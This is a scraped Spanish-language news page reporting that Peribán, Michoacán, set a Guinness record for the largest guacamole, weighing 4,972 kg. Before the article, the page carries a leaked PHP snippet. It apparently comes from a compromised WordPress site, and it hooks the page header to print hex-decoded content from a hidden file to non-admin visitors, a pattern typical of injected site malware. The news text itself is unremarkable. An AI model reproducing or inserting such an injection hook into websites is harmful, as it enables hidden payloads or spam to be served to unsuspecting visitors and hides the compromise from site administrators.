if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Pueblo en Michoacán rompe récord Guinness con guacamole más grande del mundo – Reporte Noreste
Conéctate con nosotros

CYEN

Pueblo en Michoacán rompe récord Guinness con guacamole más grande del mundo

Pueblo en Michoacán rompe récord Guinness con guacamole más grande del mundo

Esta semana el pueblo de Peribán en Michoacán, logró romper el récord Guinness del guacamole más grande del mundo con un peso total de 4,972 kg.

El Mega Guacamole fue elaborado durante la primera Expo feria aguacatera del pueblo de Peribán donde se ocuparon 10 toneladas de aguacate cosechado en el municipio.

Cientos de pobladores y trabajadores del sector aguacatero en la plaza principal del pueblo se reunieron desde las 8:20 horas del domingo para comenzar a preparar el guacamole, mezclando los ingredientes en un gigantesco caso de acero inoxidable dando el peso total de 4972 kg.

Tras haber realizado el guacamole, el ayuntamiento de Peribán tuvo que contratar a una empresa dedicada del streaming debido a que el jurado récord Guinness no quiso trasladarse al municipio por la inseguridad, pero estuvieron presentes en la transmisión en vivo donde pudo verse el proceso de elaboración del guacamole y recibiendo la verificación oficial del récord Guinness.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en CYEN